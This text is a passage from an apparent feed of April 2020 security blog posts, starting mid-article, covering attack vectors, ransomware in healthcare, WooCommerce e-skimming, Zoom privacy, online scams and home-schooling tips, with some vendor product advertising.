Brute-force attacks (the practice through which attackers submit multiple passwords with the purpose of eventually guessing them) are also a serious vector of attack. In the wake of the novel coronavirus pandemic, Heimdal™ Security’s data has revealed that the number of brute-force attacks has increased exponentially. We have noticed a 5% increase in brute-force attacks after the majority of employees have started working from home.

#5. Ransomware / Malware

Ransomware continues to be a highly lucrative business for cybercriminals. Given its huge profits, it’s no surprise that ransomware has even developed into a “business” model – Ransomware as a Service. This allows it to become easily accessible even to people with rather poor technical skills but determined to profit from vulnerable users.

Unpatched vulnerabilities in your systems can allow ransomware to pass through. The most notorious ransomware attacks to date (such as WannaCry and NotPetya) could have been avoided if systems had been patched on time.

At the same time, the huge palette of other existing types of malware can facilitate the infiltration of malicious hackers inside your organization – think about worms, trojans, rootkits, adware, spyware, file-less malware, bots, and many more.

And do keep in mind that everything I’ve listed above refers to only a few vectors of attack that can affect your business.

How to protect your organization from threat vectors

Protecting your business from different attack vectors will not be difficult with the proper resources in place. Below I’ve included the main aspects you should focus on to reduce the risk of threat vectors and prevent potential future attacks.

#1. Educate your employees

We are strong advocates for continuous security education and we believe cybersecurity awareness training sessions should always be mandatory for your employees. Workers should hone their cybersecurity skills periodically, as prevention is key to keeping your business safe in today’s digital landscape. As long as cybercrime continues to thrive and be profitable, cybersecurity training should be a continuous journey inside your company.

Your workers must be taught to recognize the signs of phishing, BEC, how to create their passwords based on your internal password policy and avoid the most common password mistakes, identify different types of malware, and learn how to report cybersecurity incidents and potential threats. You can also try running phishing simulations to help them identify the tell-tale signs of phishing and avoid falling prey to these attacks.

#2. Apply the Principle of Least Privilege (PoLP)

Limiting your users’ rights to the lowest level possible that still allows them to successfully perform their tasks is the cornerstone of PoLP. This practice closes multiple security holes inside your organization, while it allows you to achieve granular control over the actions performed and eliminate the danger of insider threats.

For instance, HeimdalTM Security’s Thor AdminPrivilege is a powerful Privileged Access Management (PAM) solution that simplifies the burdensome tasks of sysadmins who now have to manually escalate and de-escalate user permissions.

Heimdal Official Logo

System admins waste 30% of their time manually managing user rights or installations.

Thor AdminPrivilege™

is the automatic Privileged Access Management (PAM) solution
which frees up huge chunks of sys-admin time.
  • Automate the elevation of admin rights on request;
  • Approve or reject escalations with one click;
  • Provide a full audit trail into user behavior;
  • Automatically de-escalate on infection;
Try it for FREE today Offer valid only for companies.

#3. Use the right cybersecurity tools

Sometimes, even the most knowledgeable employees (cybersecurity-wise) may accidentally click on malicious links or open infected email attachments. And in certain instances, cybercriminals are doing a great job masquerading as your employees’ superiors or other authoritative figures and manage to trick them into transferring large amounts of money to their accounts. For this reason, our HeimdalTM Security experts have designed next-gen cybersecurity tools and technologies with very specific vectors of attack in mind, to help organizations avoid multiple attack scenarios.

Prevention, detection, and response are the bedrock of our philosophy. As it would be impossible to discover threats individually, we’ve gone beyond signature-based anti-malware solutions that only pick up known threats. As malware attack vectors are ever-growing in size and sophistication, we look at the Internet’s infrastructure to catch threats that traditional Antivirus don’t see. We’ve developed a highly sophisticated DNS filtering solution that blocks network communication to Command & Control servers, Ransomware, next-gen attacks, and data leakages.

At the same time, since we understand the burden of manual patching, we’ve combined Windows and 3rd party software patch management into a single tool to help you remove the risk of unpatched software and systems, all at once.

Thor Premium Enterprise is our EPDR (Endpoint Prevention, Detection, and Response) solution, which combines DNS filtering, Automated Patch Management, and a next-gen Antivirus within a single interface so that you can have a complete overview on your environment.

Heimdal Official Logo

Simple Antivirus protection is no longer enough.

Thor Premium Enterprise

is the multi-layered Endpoint Detection and Response (EDR) approach
to organizational defense.
  • Next-gen Antivirus which stops known threats;
  • DNS traffic filter which stops unknown threats;
  • Automatic patches for your software and apps with no interruptions;
  • Protection against data leakage, APTs, ransomware and exploits;
Try it for FREE today Offer valid only for companies.

To Sum Up

To evade threat vectors, organizations must simultaneously rely on an ongoing employee cybersecurity education and the proper tools.

Adopting a DNS-based approach to security, which analyzes and monitors network threats and is successful in detecting unknown malware and emerging threats is essential. At the same time, eliminating attack vectors related to unpatched software and systems, as well as properly managing admin rights will help you neutralize cyber threats before they damage your organization.

The post What Are the Main Vectors of Attack in Cybersecurity and How Do They Work? appeared first on Heimdal Security Blog.

Targeted Phishing Attacks Successfully Hacked Top Executives At 150+ Companies

In the last few months, multiple groups of attackers successfully compromised corporate email accounts of at least 156 high-ranking officers at various firms based in Germany, the UK, Netherlands, Hong Kong, and Singapore. Dubbed 'PerSwaysion,' the newly spotted cyberattack campaign leveraged Microsoft file-sharing services—including Sway, SharePoint, and OneNote—to launch highly targeted

Maintaining POS Device Security and Cleanliness

With the global spread of COVID-19, awareness about the potential risks associated with touching public-facing surfaces has intensified. Many merchants are working harder than ever to protect their customers by frequently cleaning common touch points in their stores. One of these common surfaces is the point-of-sale (POS) payment terminals where customers swipe or dip their payment card and potentially enter a PIN to confirm their purchase.

Exclusive survey: What 400 IT leaders really think about the COVID-19 crisis

A crisis on the scale of the one we’re facing demands decisive action. Luckily for many IT leaders, the first move was easy: When COVID-19 work-from-home mandates hit, those with the right policies and infrastructure in place endured the massive shift to remote work with minimal disruption. Add VPN capacity, videoconferencing, and a healthy dose of candid communication, and productivity can remain relatively unscathed.

The really tough part is planning ahead. When you’re staring into the crater where the economy used to be, crossing your fingers that the Fed’s trillions will fill it, how do you budget for the coming year? Which projects should go forward and which should be scrapped or delayed when so many unanswered business questions loom?

To read this article in full, please click here

Critical Bugs Found in 3 Popular e-Learning Plugins for WordPress Sites

Security researchers are sounding the alarm over newly discovered vulnerabilities in some popular online learning management system (LMS) plugins that various organizations and universities use to offer online training courses through their WordPress-based websites. According to the Check Point Research Team, the three WordPress plugins in question — LearnPress, LearnDash, and LifterLMS —

Cato SDP: Cloud-Scale and Global Remote Access Solution Review

The Scouts acknowledged the necessity to "Be Prepared" over 100 years (!) ago; the industry should have, as well. Yet COVID-19 took businesses – more like the entire world – by surprise. Very few were prepared for the explosion of remote access, and the challenge of instantly shifting an entire organization to work from anywhere. Cato Networks shared its increase in remote access usage post

COVIDSafe App Teardown & Panel Discussion

COVIDSafe App Teardown & Panel Discussion

I've written a bunch about COVID-19 contact tracing apps recently as they relate to security and privacy, albeit in the form of long tweets. I'm going to avoid delving into the details here because they're covered more comprehensively in the resources I want to consolidate below, firstly the original thread from a fortnight ago as news of an impending app in Australia was breaking:

On Sunday night, that app finally landed here, branded as COVIDSafe. I installed it the day after, capturing a bunch of my own thoughts and linking to efforts from the community to dissect what it was actually doing:

The efforts of fellow community members (several of them fellow Microsoft MVPs) garnered a lot of attention so we banded together to run a public panel yesterday. That 2-hour panel discussion has now been published to YouTube and it's chock-a-block full of real world observations about what the app actually does, what it collects, what it sends and what the real world privacy and security implications are. I loved being a part of this panel as it allowed us to step away from the speculation and conspiracy theories and instead focus on the facts of how the thing works. None of us have any commercial interests in this (we all went through a disclosure process in the video), it's just pure independent, fact-based discussion. Enjoy:

List of data breaches and cyber attacks in April 2020: 216 million records breached

With only 49 reported data breaches and cyber attacks this month, you might have thought April was a calm month in the cyber security department.

Of course, that couldn’t be further from the truth, with organisations being turned upside down amid the coronavirus pandemic and cyber criminals thriving on the uncertainty.

So how can we account for dip in reported data breaches? It’s simple: many organisations have been shuttered – or operating in a more limited way – during the pandemic and either aren’t performing actions that could jeopardise their security or haven’t detected an incident.

Among organisations that have remained open, the threat is more severe than ever. You can take a look at every reported incident that accounts for April’s 216,141,421 breached records here.

As always, incidents affecting UK organisations are listed in bold. Meanwhile, you can stay up to date with the latest news by subscribing to our Weekly Round-up or visiting our blog.

Cyber attacks


Human error is to blame for 88% of data breaches in the UK

Data breaches

Financial information

Malicious insiders and miscellaneous incidents

In other news…


The post List of data breaches and cyber attacks in April 2020: 216 million records breached appeared first on IT Governance UK Blog.

Ransomware Attacks: Cybercriminals Pinpointing Healthcare Organizations

Cybercriminals target healthcare

No One is Invisible to Ransomware Attacks: Cybercriminals Pinpointing Healthcare Organizations 

 In this challenging time, cybercriminals have their eyes on consumers and institutions alike. Malicious groups have increased their targeting of hospitals and healthcare entities to take advantage of deepening resource strain. Many of these groups are using ransomware attacks to compromise hospital systems, locking up patient records or vaccine research until a hefty ransom is paid. The requested sum is usually a high value of Bitcoin or alternative cryptocurrencies, as these are typically more difficult to trace 

However, unlike with old tax paperwork or private family photos, the impact of losing or mass distributing patient records could literally mean life or death for those awaiting urgent care or diagnosisBad actors count on this urgency to guarantee that their ransom is met 

Be wary of old tactics with a new twist 

The tactics these cybercriminals use can be a combination of traditional phishing and vulnerability exploitationReportedly, the WHO has seen a twofold increase in phishing attacks by cybercriminals attempting to steal credentials. Some ransomware groups have stated they will avoid targeting hospitals given the current strain on healthcare systems. Still, claims from criminal organizations should be taken with a hefty grain of salt.  

Keep your security up to date 

In the meantime, McAfee Advanced Threat Research is closely monitoring new threats that aim to take advantage of the uncertainty surrounding the pandemic. The team has analyzed these threats based on geography, and will continue to report further findings. While these threats are not unexpected as cyber criminals always try to leverage large events to their advantage, it is disappointing to see at a time when the world needs to come together that there are those who have scant regard for the sense of community. 

Stay ahead of malicious threats 

Whether you’re a healthcare professionalfamily provideror both, here are some tips that can help you stay ahead of malicious tactics being used to attack individuals and healthcare institutions 

  • Secure your home network by checking your device passwords and Wi-Fi password. Make sure your system and software are all up to date, and take the time to perform pending updates.  
  • Avoid clicking on emails and texts from unknown senders. Be wary of any communication coming from “official” sources that encourage urgent actions on provided links or ask for your login credentials.  
  • Check in often with family and friends and be their technical advisor if needed to help steer them away from social engineering or spammy phishing. Consider using a free safe browser extension that can help steer you away from illegitimate sites.  
  • Be sure to set up robust security on devices that may now be seeing a lot more online time.  
  • Don’t forget your phone  stay protected from malicious apps and smishing/vishing attempts.

The post Ransomware Attacks: Cybercriminals Pinpointing Healthcare Organizations appeared first on McAfee Blogs.

School From Home: Project-Based Learning

School from Home: Project-Based Learning

If keeping your kids on task and engaged with schoolwork from home is proving to be a challenge, you aren’t alone. We recently surveyed families and found that keeping kids focused was at the top of parent concerns right alongside establishing a routine. Just as school-aged kids can often struggle with homework completion during a normal school year, the challenges are magnified right now at home. If you’re a parent living through this pain right now, here’s something that can help: project-based learning.

Like adults, kids often engage more authentically with project-based work that they feel connected to on a personal level. Finding those connections without the in-person presence of a teacher to help create context makes it all just a little (or a lot!) harder for many of us right now as we try to make sure our young scholars are continuing to engage with learning.


How are your children spending their time?

Depending on grade level and the number of weeks your student has been learning from home, you might be encountering varying levels of work assigned by teachers and varying levels of work completed by your kids. Assignments from school might be non-negotiable for many students, especially high school-aged kids who are receiving credit and, in some cases, preparing for high-stakes tests such as AP exams, being taken this year from home.

If your personal situation at home is one of optional assignments or work from school that’s finished quickly leaving your student bored or going on autopilot on a device, here’s a self-directed project almost any age child can enjoy: Genius Hour. It’s relatively easy to get started and best of all, there’s no grading at the end!

Project-Based Learning That Gets Kids Motivated

Genius Hour (sometimes known as 20% time) is a concept implemented at some innovative companies like Google in which employees take 20 percent of the work week to pursue projects of their own interest. Many teachers in recent years have adopted the practice as a way to increase engagement among students by giving them time to explore a project of their own choosing while connecting components of the project to scholastic skills connected to research, critical thinking, reading, writing, and presentations. Teachers set certain requirements to keep the expectations high and then provide resources and guidance along the way.

How does Genius Hour work?

Here’s a quick snapshot of how Genius Hour works—followed by a few details and some helpful links to help you get your child started:

  • Choose a topic you’re interested in.
  • Form a guiding question to focus your study.
  • Decide how you’ll show what you’ve learned.
  • Look for resources and start learning.
  • Present your project.

Choose a Topic and Create a Guiding Question

An important part of Genius Hour is forming a question to focus and guide a student’s study. To maximize engagement and focus, kids should choose a subject they would genuinely like to explore. Topics are wide open and do not need to relate directly to any current study from school, so your child’s topic can connect to current interests or a new curiosity.

Genius Hour for Young Kids

For young kids, a topic like weather or pets could, with parent help, be focused by a guiding question like “How do bodies of water impact weather?” or, “What animals make good pets?” Younger children might connect most readily to subjects they’re learning about at school such as weather, rocks and minerals, or farm animals.

Genius Hour for Students

Older students should be able to come up with many areas of interest that might be spurred by what they’re learning at school or topics entirely of their own choosing. A young student musician, for example, may be interested in a particular musical genre like hip hop or jazz. She might then form an essential question to focus her study along the lines of “What are the influences on today’s most successful hip hop artists?” A student interested in physical fitness or a student missing their sports practices might pose a question for study like “What home workouts are best for keeping fit for my sport?”

Decide How to Show What You Know

At the end of this project, students create something—a slideshow on the computer, a drawing, a diagram, a photo series, a song, a poem, a video, a podcast, or a poster—to show their learning. Creating an artifact allows students to synthesize their learning in a creative way. And that artifact can be as broad and varied as the materials as the student has access to. Anything works. High tech or on paper. The medium really doesn’t matter, because the learning occurs as a natural part of the process.

Track Down Resources and Start Learning

Equipped with a topic of interest and a guiding question, your child can begin exploring resources from right at home. Researching online is an obvious first step—but consider some other avenues too. You can also point your child toward movies or documentaries connected to both topic and guiding question. And who knows, you may also have some useful books or magazines around the house too. Other options beyond going online for research include conducting interviews on the phone or through video conferencing. Help them think beyond the screen, at least for starters.

Research online

As for resources online, many museums now offer virtual tours of their collections. While we can’t travel there in person, the Smithsonian National Museum of National History offers a number of virtual tours online, and the National Park Foundation will take you on a virtual visit to the national park of your choosing.

Is your young athlete missing sports? Local gyms and community centers may have exercise and workout programs online for kids who’re interested in fitness-related topics. Likewise, most pro organizations currently have added content on their websites like the official site for Major League Baseball where you’ll find history, videos from past games, and even mascot origin stories.

If your child is interested in exploring the world, National Geographic Kids has an abundance of online resources. Older kids can explore magazine and newspaper websites as well and many currently have free access right now. In addition, video learning from YouTube can be a wonderful resource depending on age, access, and parental guidance.

Internet safety for kids

As with any work your children are doing online, now’s an excellent time to remind them how to be particularly safe when exploring resources online. They’ll want to watch out for fake apps, risky links, and sketchy downloads as they always do—particularly now as hackers have cued into the increase of schooling at home going on right now and are looking to take advantage. A comprehensive security solution will help them look after their safety and privacy.

Share What You’ve Learned

Once your child has spent time reading, viewing, listening, and learning, it’s time to create an artifact to show what they’ve learned. See possibilities listed above, because the final step in the Genius Hour project is to share the learning.

Usage of video conferencing

Anyone at home can sit in on the audience and even an audience of one works just fine. If you like, you can invite other friends and family with a quick video conference so that they can participate too. This offers kids a great way to connect with extended family members like grandparents or even their friends from school. (Imagine a few parents getting together and having all of their kids present their projects and then hanging out for an online chat after that …)

During the presentation, students share their topic, why they chose it, their guiding question, their artifact, and what they learned. In the classroom, a teacher would then engage students in a reflection of the process from start to finish. You can do something very similar by following up with questions from the audience, whether they’re in person or online. This is a wonderful way to close the journey and for everyone to gain something from the process.

Duration of Genius Hour

Genius Hour is highly adaptable and can take a few days or several weeks. It can be low-tech or high-tech depending on resources and preferences. For kids with time on their hands and parents who want a little extra focused learning and engagement, this project just might fit the bill. Check out this article to learn more about Genius Hour in the classroom.


Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.



The post School From Home: Project-Based Learning appeared first on McAfee Blogs.

What E-Commerce Sites Can Learn from the Covid-19 Pandemic

For the last few years, cybersecurity experts have been sounding the alarm on something called e-skimming. In this kind of attack, hackers intercept payment card data and personal information from e-commerce sites by exploiting the architectural complexity of those e-commerce sites. 

While there have been several major breaches that were the result of e-skimming, including Macy’s and British Airways, the bulk of these hacking campaigns have been attributed to an individual or a group of hackers called Magecart. S/he or they usually target the Magento platform, often by injecting rogue code into outdated plugins and extensions for websites.

Magento isn’t the Covid moment here. E-skimming is. 

Enter WooCommerce 

Security researchers discovered what could be a game changer in e-skimming attacks earlier this month, one that exponentially expands our collective attackable surface.

Magento has about a 12% market share and represents less than 1% of the entire assemblage of code that comprises the Internet. 

The discovery I mentioned is that a new e-skimming hack has been targeting WooCommerce, which is a far more ubiquitous online shopping plugin used in 26% of all e-commerce sites. WooCommerce is native to and powered by WordPress, a platform that represents over 35% of websites currently online. It would be hard to find a larger attackable surface on the Internet.

The threat posed by a hack targeting WooCommerce isn’t bad only because of the technology’s ubiquity. The issue has to do with who uses it. The quick answer is: Anyone. Contrast that with Magento, which is designed for enterprise-level sites that have detailed inventory needs and other layers of complexity. Magento requires installation, development, and maintenance by trained web professionals certified by the company to understand its many nuances. 

WooCommerce, on the other hand, is easy to use and install; a user with little to no experience building websites—and even less knowledge of cybersecurity best practices—can use it to get an e-commerce site up and running with ease. 

This would be a bad situation in normal times, but with the Covid-19 pandemic making many businesses more reliant on e-commerce and virtual transactions, the potential for an increase in poorly secured websites built on the fly is a matter for concern. 

That said, the bigger issue may be the nature of the hack itself. While e-skimming attacks have usually involved the compromise of vulnerable third-party software, e-skimming injects malicious code into the core source code of WooCommerce which makes it much harder to detect–particularly for non-expert site builders.

“With credit card swipers it’s common for attackers to simply include/append malicious javascript from a third-party website,” said Sucuri researcher Ben Martin, who first wrote about the attack. “The fact that the malware lodged itself within an already existing and legitimate file makes it a bit harder to detect.”

There are parallels with the early days of the Covid-19 pandemic. A relatively familiar threat has surfaced in a more dangerous form that is harder to detect and has the potential to impact a significantly larger number of victims. 

Like Covid-19 in January, the current WooCommerce hack is a nascent threat, but unlike the virus, you can prepare for the threat and mitigate the potential damage. 

A good place to start is for businesses and consumers to use a system I call the 3 Ms:

Minimize the Threat: Businesses doing e-commerce need to keep their website and security software up-to-date. Those companies that have the technical know-how should run regular scans for the presence of rogue code on their websites. If they don’t have that resource in house, they would be well advised to hire a cybersecurity expert to do it for them. Most important is to practice good data hygiene, especially when relying on a remote workforce. A single login and password hooked by a phishing email could provide hackers with the necessary credentials to compromise a website, as well as its customer and payment data. 

When making payments online, consumers should use credit cards instead of debit/bank cards, which can provide hackers a direct conduit to their bank accounts.

Monitor Accounts: Keep track of your bank and credit card accounts to know as quickly as possible when something isn’t right. The most effective way to do this is to sign up for transaction monitoring—offered for free by banks, credit unions and credit card companies— which notifies you of any activity in your credit or bank accounts.

Manage the Damage: If a business falls prey to an e-skimming campaign, it’s crucial to act as quickly as possible to alert the authorities, notify consumers and identify the source of the hack. Customers affected by an e-skimming breach should immediately contact their payment card companies, request new cards, and lock down any potentially impacted accounts.

Malware and viruses are opportunistic. With more businesses relying on e-commerce to make up for shuttered physical storefronts, newly remote workers struggling to secure their home offices from cyberthreats, and more customers using e-tailers for their day-to-day shopping, the circumstances are ideal for a new strain of malware to spread. 

The post What E-Commerce Sites Can Learn from the Covid-19 Pandemic appeared first on Adam Levin.

Getting Started With Base64 Encoding and Decoding

Hello and welcome. My name is John Strand and in this video, we’re going to be talking about Base64 encoding and decoding. Now the reason why we’re talking about it is once again we have the BHIS Cyber Range for our customers and friends and this is just basically a video to walk people through […]

The post Getting Started With Base64 Encoding and Decoding appeared first on Black Hills Information Security.

Is Zoom Safe to Use?

With the majority of the world has been in quarantine and self-isolation for over a month now, by now, we’ve grown accustomed to working from home, and employing technology to communicate virtually with our colleagues and acquaintances, which includes everything from social media platforms, to hanging out on Google.

Having said that, Zoom- the online conferencing call application has skyrocketed in popularity, which is indicated by the fact that daily active users have increased by a staggering 67%. With millions of individuals in lockdown globally, Zoom has emerged as a highly lucrative tool, which also helps maintain a semblance of normalcy, amidst the uncertainty looming over our heads in the form of the COVID-19 pandemic.

By this point, whether you’ve wanted to or not, chances are that you’ve been the part of at least one conference call, class, or even a fitness session on Zoom. Although the online video conferencing application might be nothing short of a godsend if you’re a teacher, or a team manager, as the number of people using Zoom increases, so will the security problems associated with it.

Since Zoom is a fairly new application, most individuals tend to overlook the security loopholes present within the application and continue with their online conferencing business as per usual. The consequences of foregoing security on Zoom, however, can be dire, as is further made evident by the multiple stories circulating about “Zoombombing”, along with several teachers experiencing disruptive behavior, where users broadcast pornographic, hateful, or racist content in between sessions. Moreover, there have been several accounts of private meetings being hijacked by the presence of an intruder.

Responding to the massive number of complaints, Zoom did update its blog detailing some tips and tricks that might prove to be useful in fostering protection on Zoom, there is still a lot of vagueness surrounding safety on Zoom. Zoomboming aside, a recent report revealed that Zoom’s data is being routed through Chinese web hosting servers.

Shockingly, the parliament of the United Kingdom has been using Zoom for sensitive meetings. A follow up study by, a web hosting reviews website based in London, found that even if parliament used other video conferencing applications, much of the call data would be routed through international data centers.

In an attempt to aid our readers, and to clear most of the doubts that they might be harboring, we’ve compiled an article that dives deep into the safety aspect of the popular online conference calling application, along with some tips to boost security.

Do You Really Need to Worry About Your Privacy While Using Zoom?

A popular question that many individuals have been asking, is whether concerns over Zoom’s privacy policy are legitimate or not. After all, in the midst of the coronavirus pandemic, it’s safe to say that most of us have already got a lot to worry about, without having to stress over our private online meetings being sabotaged by an intruder.

Despite not wanting to pay heed to any other worries other than the coronavirus right now, we believe that staying informed about the threats present on Zoom is highly critical to ensuring cybersecurity in the long run. Moreover, staying in the know-how of the vulnerabilities present on Zoom can also help prevent you from being the victim of a cybercrime, which is almost certain to add to your worries.

With that out of the way, Zoom, unfortunately, just like every other web-based platform, does consist of multiple entry points through which hackers and other cybercriminals can gain entry into a confidential online conference call. The greatest risk to users’ privacy is the fact that Zoom collects information, and permits other third-parties to collect data on their users as well.

Bearing a striking resemblance to Facebook, Zoom’s privacy policy (which most of us don’t even bother to read) contains a clause that includes the right to collect it’s users’ data, store it on any popular cloud storage provider, and to share it with third-parties. Typically, these third-parties consist of advertisers, who now, through Zoom have access to your information. It is also worth mentioning that Zoom’s right to collect data isn’t just limited to users name, location, and usage information,  but also the content shared in the online calls as well,  such as instant messages, files, whiteboards, etc.

Bearing witness to the vulnerable nature of Zoom’s privacy policy is the discovery of a software vulnerability that left millions of users’ videos exposed. Fortunately enough, Zoom was extremely robust in its effort to remedy the discovered vulnerability, and the issue has since been resolved.

Although the video vulnerability has been fixed, the tool that was used to identify the vulnerability can potentially allow anyone to manipulate a meeting code and gain entry into a confidential meeting. Along with the tool allowing access to a Zoom meeting, it has also been brought into light that malicious agents can rely on software to guess meeting ID numbers. Cybersecurity specialists have already devised a software program, called zWarDial, which can predict Zoom meeting IDs between nine and eleven digits.

Although zWarDial can only identify meeting IDs correctly, with an accuracy of about 14%, these statistics still lead to 100 meetings being compromised in the course of an hour. Once the program finds an activity meeting, it can then go on to discover the meeting link, date, and time, along with other crucial details such as the meeting organizer and the meeting topic.

How Can You Stay Safe on Zoom?

Up till this point, we might have drilled an image of Zoom as the harbinger of destruction to the already cybersecurity infrastructures that we’ve put up. Although that statement might be a tad bit (read: heavily) exaggerated, there’s a huge silver lining to look forward to.

Once you start taking security seriously and follow some steps, whether you’re hosting a Zoom meeting or attending one, you can navigate and make the most out of the popular online conferencing application

Safety Measures to Take as a Host

  • Always be extremely cautious of the people that you’re sharing your public meeting link with. Try not to upload it on social platforms, which might result in untrustworthy individuals gaining access.
  • As a precautionary step, you can also set up a password for participants to validate their entry into the meeting.
  • Whilst screen sharing, make sure that you’re the only person in control by ensuring that “Host” is the only option selected from the “Who Can Share?” menu.
  • Set two-factor authentication, and remove any unwanted participants from the meeting.
  • Last, but certainly not least, if you encounter Zoombombing or any suspicious activity in your meeting, report it directly to Zoom.

Safety Measures to Take as a Meeting Attendee

  • To ensure that your data isn’t being shared with untrusted parties, ask whether your host is recording the call. You can also determine this by seeing if there’s a small red dot on the screen.
  • Ask your host as to their reasons for recording the call, and where your information is being stored. To ensure maximum security, recorded content should be stored on a secure server.
  • If you wish to protect your room’s privacy, try using a virtual background to prevent sharing unnecessary information about your personal space, such as the posters you’ve put up in your room, etc.
  • Ensure that your camera and microphone are turned off when you aren’t talking, so as to prevent unwanted attention to your actions and responses.

Parting Words

Amidst the COVID-19 pandemic, with a monumental number of people locked up in their homes looking for answers, the Zoom application has now become a staple tool for many. Not only does it allow us to socially distance while being social, but it also helps maintain some sense of normal life.


Having said that, however, users can significantly amp up on their security on the online conferencing application, simply by adhering to the safety steps that we’ve mentioned above!

The post Is Zoom Safe to Use? appeared first on .

How to Spot an Online Scam?

With the advent of ‘smart’ devices, which includes everything from self-driving cars, smart assistants such as Amazon’s Alexa to smart refrigerators, the modern-day internet continues to expand into the vast IoT, giving rise to a highly interconnected digital landscape.

On the surface, the interconnectivity offered by the IoT seems to be highly advantageous, and although that might be true to a certain extent, it also offers several entry points for cybercriminals to profit off of naive internet users.

Moreover, despite the 391,000,000 Google search results that come up when you type the words ‘online scams,’ for many individuals, there are still many doubts and uncertainties as far as online fraud is concerned, particularly in light of how easy it’s become to falsify reviews in Google and elsewhere.

For starters, the most basic mistake that the naive internet user is likely to make is to group together all sorts of online scams, and cybercrimes together, which results in the poor prioritization of threats. Along with the misunderstanding that all scams are created equal, the typical internet user is also unequipped with the means to identify subtler scams.

In an attempt to aid our readers in identifying an online scam while it is still in its initial stages, we’ve compiled an article that covers everything that you need to know about online scamming, along with tips to prevent them from happening, and steps that you can take in the instance you find yourself a victim of an online scam.

What Exactly is an “Online Scam”?

Up till this point, we’ve only skimmed over the details of what an online scam is. To put it quite simply, and as the name itself suggests, an online scam is a type of digital fraud. With rapid-paced advancements being made in email marketing, internet protocol technology, and web hosting performance, online scams have taken on an arsenal of forms, all of which are growing increasingly sophisticated.

How sophisticated, exactly? In a recent interview with Gary Stevens, founder of the Ottawa-based web hosting reviews website, Stevens said this: “Since 2016, we’ve seen a 381% increase in the sophistication of online scams routed through most Canadian web hosts. Not only are they increasing in frequency, but also in sophistication.”

Having said that, the pivotal focus of an online scam is to leverage an individual’s personal information for financial gains. Typically, the stolen confidential data is utilized by cybercriminals to trick people into giving them money.

Most online scams fall into one of the following categories, which include the following:

The Email Money Scam

Perhaps the least sophisticated online scam out there, email money online frauding schemes rely heavily on the naivete of its victims, to fall into the hackers’ poorly constructed web of deceit.

One of the most common examples of the email money scam is the ‘Nigerian bank scam,’ which sends potential victims emails, or messages, which usually leads to some sort of advanced-fee fraud taking place. Fortunately, however, despite how persistent the Nigerian 419 scam is, one need only look out for the many red flags to avoid it.

The ‘Compromised’ Friend

One of the defining characteristics of an online scam is that they usually propagate in every aspect of an individual’s life, including friendships, which as it turns out, offer an excellent medium to further spread the scam.

We’ve all been in situations where we’ve received an urgent message on Facebook Messenger from a distant relative, or acquaintance expressing a grave situation that they’ve landed themselves in, and how they need financial help from you. Unlike the email money scam, people are more likely to fall for a message from a compromised friend, since they think that they’re helping an acquaintance in need.

The Tailor-Made Problem

As technology steers itself forward at lighting pace, cybercriminals all over the place have taken to creating increasingly sophisticated and complex scamming schemes. One such example is when online scammers scour through your social media platforms, along with the sensitive information that they’ve stolen, to create a specific problem in an attempt to coerce an immediate payment. Typically, the problem may involve a family emergency or an alleged debt that needs to be paid off immediately.

Why Do Individuals Fall for Online Scams?

From what we’ve described so far, some of our more cynical readers might be wondering why people fall for online scams in the first place. Some of them, such as the Nigerian 419 scams, have several tell-tale signs that make avoiding the scam a piece of cake.

Despite the multiple red flags that an online scam might display, individuals fall prey to online fraud schemes, simply because these scams are designed in a way that enables cybercriminals to prey on the natural human inclination to seek gain.

Simply put, an online scam works because it targets individuals’ emotions, rather than their logic. For an online scammer, the task is quite simple- all they have to do is come up with an offer that is too good to be true, or a situation that leverages someone’s weakness and makes money off of it.

In addition to preying on our innate human tendency to seek gain and avoid loss, these online scams also target the instinctive choices that we make. Some of the most common examples of this are the fear of missing out, where we’re promised a huge reward but only if we act instantaneously. Similarly, there’s loss aversion, which has an individual act quickly to avoid facing bigger losses later.

How Do Online Scammers Discover Their Victims?

As is the case with most scams, whether they be online or not, scammers rely on an arsenal of ways to wreak damage on their victims. Some of the most popular ways through which online scammers lure their victims include the following:

●     Email Phishing:

The most common way through which online scammers launch their deceiving schemes is through email phishing. Phishing refers to cybercriminals sending emails containing a malicious link to a fraudulent website, which is typically disguised as a banking or e-commerce site, which tricks the victims into giving their financial details.

●     Mobile Phishing:

Similar to email phishing, mobile phishing focuses on getting potential victims to download malware on their mobile devices. The malware then works in the background, to snoop around and collect sensitive information of the victim, including financial details.

●     Fake Software:

Another popular way for cybercriminals to launch their online scams is through fake software, which is also referred to as scareware. While browsing, potential victims receive a pop-up window indicating that their device has been infected with a virus. Once users click on a link to remove the infection, the scareware installs malware on their device, which allows the scammer to harvest confidential information for their monetary gains.

●     Social Media:

Sometimes, popular social media platforms can also house online scams, which encourages users to click on a malicious link. Furthermore, since people are very forthcoming with their personal information on social media platforms, they can also be highly susceptible to identity theft, and socially engineered scams.

Can Online Scams Be Avoided?

Despite seeing a spike in both popularity and complexity, individuals can still avoid online scams, by taking a couple of simple steps, which consist of the following:

  • Try to stay away from posting personal information on your social media accounts. Although the temptation to post about our achievements might be too strong, we’d recommend that you don’t provide cybercriminals with a data source to launch socially engineered attacks, and scams on you in the future.
  • Avoid clicking on any unexpected links, which includes pop-up windows, and any ‘shady’ links present within the body of an email that you’ve received.
  • If you’re stuck in a situation where the other party is pressuring you for immediate payment, we’d highly suggest that you ask them for documentation, which is surely going to confirm their legitimacy.
  • The last one on our list shouldn’t even be here, but unfortunately, there have been several cases of people giving their passwords to strangers online. The basic rule that you need to engrave on to your hearts, is to never, under any circumstance, give your password to people!

 What Steps Can You Take Once You’ve Fallen Prey to An Online Scam?

In the unfortunate instance that you’ve fallen victim to an online fraud scheme, the first and foremost step that you need to take is to report the scam.

We’d suggest that you report it to a legitimate organization such as the FTC or the Internet Crime Complaint Center (IC3). They may be able to point you toward reputable data recovery services, but it’s hard to say whether or not they will be able to fix all the damage that’s been done.

Moreover, if you notice any suspicious credit/debit card transactions, contact your bank and ask them to reverse any fraudulent charges.

In cases where you suspect that your devices have been infected with malware, run an antivirus and antimalware software, along with changing all your passwords to protect any further sensitive information from being compromised.

Last but certainly not least, notify all your friends and family about the scam, so as to prevent the scam from propagating any further than it already has.



At the end of the article, we can only hope that we’ve gotten the basics of spotting an online scam down for our readers. As scammers employ a variety of complex techniques to deceive innocent people, we’d like our readers to realize the significance of taking their privacy seriously, and taking the aforementioned steps to stay safe online!

The post How to Spot an Online Scam? appeared first on .

Trend Micro’s Top Ten MITRE Evaluation Considerations

